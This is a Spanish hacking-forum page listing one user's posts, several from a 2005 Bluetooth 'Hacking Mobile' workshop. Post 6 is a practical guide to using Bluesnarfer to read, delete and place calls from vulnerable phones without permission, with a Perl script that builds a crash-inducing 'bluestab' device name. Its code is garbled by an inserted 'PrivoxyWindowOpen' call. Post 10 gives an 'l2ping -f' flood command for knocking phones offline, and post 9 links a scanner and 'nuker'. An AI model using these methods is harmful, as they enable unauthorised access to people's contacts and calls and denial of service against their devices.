elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: [1] 2 3 4
1  Foros Generales / Sugerencias y dudas sobre el Foro / Re: O nos ponemos en campaña o nos despedimos (DDoS). en: 24 Febrero 2007, 13:19 pm
Cómo no se puede ir zombie por zombie, se me ocurre una idea.


Al menos servirá para quitar alguno de un modo "sencillo"

Se podria poner en la cabecera del foro, a modo de publicidad, un enlace para descarga de algún antispyware, o algún antivirus on-line gratuito, o scan on-line.

Que sea obligatorio su aceptación para entrar al foro, por cada ip. Tampoco es que sea la panacea, y tiene muchos inconvenientes para usuarios que no estamos infectados de *****, pero al menos yo estaría dispuesto a tragar, durante un mesecillo, o dos si hace falta, por lo menos para limpiar un poco visitantes del foro




salu2
2  Foros Generales / Sugerencias y dudas sobre el Foro / Re: O nos ponemos en campaña o nos despedimos (DDoS). en: 24 Febrero 2007, 12:48 pm
Este foro siempre ha estado lleno de niñatos lammers, y de chulos prepotentes que sólo crean enemigos...

Viendo esto, no es raro que estas cosas sucedan....

Y lo peor es que realmente hay poco que hacer para evitarlo...

La verdad he echado de menos estos dias el foro, pero no creo que sea la última vez que ocurra....

¿Debería ser el foro, un lugar mas restringido para personas con un cierto nivel, que se sepa que no estropearán todo esto?... :S
3  Comunicaciones / Hacking Mobile / Re: Sniffer Bluetooth en: 29 Septiembre 2005, 21:38 pm
Bueno  lo dichoSirGraham, el programilla este que detectaba la calidad de la señal BT, que se puede usar como un localizador, ya que a mas cerca mejor calidad creo q era uno de estos: bluesnarfer, bluesniff, o btscanner. era uno para linux, pero ya no recuerdo bien cual era de estos, pero vamos son pequeñas aplicaciones. Bueno si no los encuentras para descargar los puedes descargar desde:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=search&query=bluetooth

También hay alguna otra aplicacion BT, cuando tenga un ratillo si eso te digo cual era que ahora mismo no recuerdo exactamente.

un saludo
4  Comunicaciones / Hacking Mobile / Re: Sniffer Bluetooth en: 23 Septiembre 2005, 01:10 am
Bueno de sniffer yo no conozco ninguno pero el caso de medir la intensidad de la señal BT si.

Tengo por ahí un programilla que mide la calidad de la señal BT, por lo tanto cuanto mas cerca te va mejorando la calidad, y puede servir como localizador y ver en que puntos mejora la señal. A ver si lo encuentro y te digo como se llama o el link que tengo q buscarlo por aquí.

Salu2
5  Comunicaciones / Hacking Mobile / Re: comunicacion webcam - pc ? en: 2 Septiembre 2005, 02:22 am
Para poder hacer eso necesitarás primero proporcionar a la webcam energia, y si no la conectas al pc por usb tndrás que proporcionarle energía por algún lado, cosa que veo dificil a no ser que tengas conocimientos avanzados de electrónica. En segundo lugar en caso de que supieras hacer eso necesitarios dos dispositivos de BT, uno en el pc y otro en la webcam, el problema claro esta, es acoplarlo en la webcam, y eso.... pues realmente creo que habría que rediseñar todo el concepto, así que lo considero realmente dificil, por no decir imposible.

Sería mas facil coger un movil con camara y BT y hacer la conexión remota y aún así seria bastante complejo
6  Comunicaciones / Hacking Mobile / Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc... en: 12 Julio 2005, 12:15 pm
Bueno voy a hacer mi aportación personal al taller, como ya puse otras noticias y descargas ahora voy a seguir con otra práctica, rápida y simple.


PRIMERA PARTE

Lo que vamos a ver es cómo acceder a un teléfono movil con BT ( no todos los móviles son vulnerables). Como habréis leido en varias noticias, por ejemplo en la recopilación que hizo firos:

http://foro.elhacker.net/index.php/topic,77595.0.html

Se habla de bluesniffer, que con un portatil accediendo a un parlamento o senado no recuerdo bien, se hicieron con la agenda electrónica de muchos de los políticos, pues ahora os voy a mostrar cómo se hizo este ejercicio, bastante simple a pesar de parecer muy complicado.

Para ello necesitaremos un programa del mismo nombre blusnafer que podeis descargar aquí:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=277&title=Bluesnarfer%200.1

Este pequeña utilidad permite por medio de comandos acceder a ciertos teléfonos móviles vulnerables, y conseguir ver un listado de las últimas llamadas, ver la agenda electronica, borrarla, hacer llamadas , etc... todo esto lo podéis ver en el siguiente video explicativo bastatne corto y muy demostrativo de lo simple que resulta hacer todo esto:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=280&title=Video%20tutorial%20de%20blue%20snarfer

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


SEGUNDA PARTE

En esta segunda parte voy a mostrar algo bien simple, es una vulnerabilidad conocida como bluestab, (puñalada azul) la cual permite el reinicio de ciertos dispositivos vulnerables, para lo cual basta con cambiar el nick de tu dispositivo movil, esto es debido a usar una parte de código hexadecimal en el nick que provoca que ciertos teléfonos se bloquen y es reinicien automaticamente, esta vulnerabilidad es muy curiosa ya que simplemente con tener este nick, cuando alguien busque dispositivos BT y encuentre el tuyo, se reiniciará automaticamente sin saber el motivo. Para realizar esto basta con usar el siguiente programa que os creará un nick "xploit", que debereis copiar luego como nick.


Código:
nokia-bt-cx.pl

-------------start---------------

#!/usr/bin/perl -w



my $btnick;

my $bth;

my $bts;

my $file;

$bth = " .";

print "\n********************** ************************************************** **************************** ************\n

";

print "****************** Reinicio de dispositivos vulnerables por medio de nombre en dispositivo BT ********************\n";

print "** mas información sobre su uso en http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=217 **\n";

print "*****************                                [::wormz::] www.wormzweb.tk                      *****************\n";

print "************************* ****************************** ****************************** ******************************\n";



print " \n Escribe tu nick : ";

$btnick = <STDIN>;

chomp($btnick);

print " \n OUTPUT : ";

$file = <STDIN>;

chomp($file);

PrivoxyWindowOpen(BLUEN, ">>$file") || die "No se ha podido crear el archivo $!\n";

$bts = "$btnick$bth";

print BLUEN ("$bts");

close(BLUEN);



print "\n ¡Finalizado! , Envia el texto a tu teléfono y copialo en el nombre de tu telefono BT \n\n";

-------------end-----------------

Bueno como he dicho este programilla os creará un fichero que debeis enviar a vuestro movil y copiarlo en el nick.

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


TERCERA PARTE:

Bueno, siento no ser mas comleto en todo esto pero estoy aún bastante liado, espero que en unos dias tener mas tiempo y poder ser mas específico y explicar todo mas en profundidad para los que le gusta la teoría, también para los que les gusta juguetear con pequeñas aplicaciones les recomiendo que vean la noticia que puse en mi web sobre hack BT, en la que hay unas pequeñas aplicaciones para descargar muy simples, que por lo general son escaneadores con diferentes utilidades y bastante interesantes.

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218

Espero haber servido de ayuda en el taller y que sea una aportación mas al taller BT.

Un saludo xXx
7  Comunicaciones / Hacking Mobile / Re: Pregunta sobre el curso en: 17 Junio 2005, 10:19 am
No exactamente, lo que pasa es que cuando tu envias por ejemplo algo desde tu movil al ordenador, te pide que introduzcas un pin, y luego tu ordenador te dirá que el dispositivo xxxxxx esta intentando enviar algo a tu ordenador que intruduzcas el pin de enlace, que debe ser el mismo que se introduzco en el movil, cuando se hace esto se dice que los dispositivos estan emparejandose, es en ese momento, (la 1º vez que se conectan entre ellos y se pide el código) cuando hay que estar presente, para conseguir ese código y hacerte pasar luego por el dispositivo. ;)

Creo que se me ha entendio pero si no es así a ver si unravel te explica mejor que tiene una idea mas profunda del tema.

Salu2
8  Comunicaciones / Hacking Mobile / Re: Bluetooth SIG DoS & Programa para escanear y nukear dispositivos BT en: 15 Junio 2005, 22:45 pm
jeejej bueno no viene mucho el tema y no creo que a los admins que les haga gracia el cambio de tema pero bueno te contesto y así lo dejo zanjado para seguir con lo del BT ;)

Si lo de la web tengo ciertos problemas con el theme visualizado con mozilla, que a veces se carga mal, pero vamos la cierras y la vuelves a abrir y se vuelve a ver bien, no se exactamente cual es el problema porque se visualiza bien según le da el momento... :S cosas con mozilla, con explorer se visualiza perfectamente, y con opera también hay problemas con el tag que no sale para escribir :S pero bueno hasta que haga otro theme ya no toco mas este que ya me dio mucho comedero de cabeza arreglarlo que da muchos problemas. 1 saludo y gracias ;)

y volviendo al tema, alguien ha probado o ha averiguado si hay mas dispositivos vulnerables?

salu2
9  Comunicaciones / Hacking Mobile / escaneador de dispositivos BT y nukeador para linux en: 15 Junio 2005, 01:05 am
Bueno como el taller de BT ha empezado hace poco aquí voy haciendo mis pequeñas aportaciones, esta primera será un poco práctica con la descarga de un pequeño programa para linux, llamado t bear, que permite el escaneo en busca de dispositivos BT en el entorno, y también dispone de un apartado que permite el ataque DoS a dispositivos vulnerables que se comentó en el post anterior.

para leer mas sobre el programa y sobre los dispositivos vulnerables en castellano:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=205

Para descargar t bear:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=264&title=T-Bear

Salu2
10  Comunicaciones / Hacking Mobile / Bluetooth SIG DoS & Programa para escanear y nukear dispositivos BT en: 14 Junio 2005, 12:07 pm
En securityfocus se ha reportado un fallo de seguridad, consiste en un ataque DoS al hacer un ping a dispositivos BT desde linux, al parecer esto produce que el dispositivo deje de responder.

Se ha comprobado con:

- -Nokia 7650 (Symbian 6.0)
- -Nokia 6600 (Symbian 7.0)
- -Siemens V55
- -Motorola S55
- -Conceptronic (CBTU)


Y al parecer aún no está claro a que es debido, algunos comentan que es un fallo de diseño del BT, pero aún no se tieen claro.

Al parecer incluso en algunos casos si el dispositivo esta oculto puede ser atacado.

Para reproducir desde linux:
# l2ping -f <bluetooth_address>



Más información en securityfocus (en inglés)

http://www.securityfocus.com/archive/1/402156/30/0/threaded

Mas información en wormz (en castellano)
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=205
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines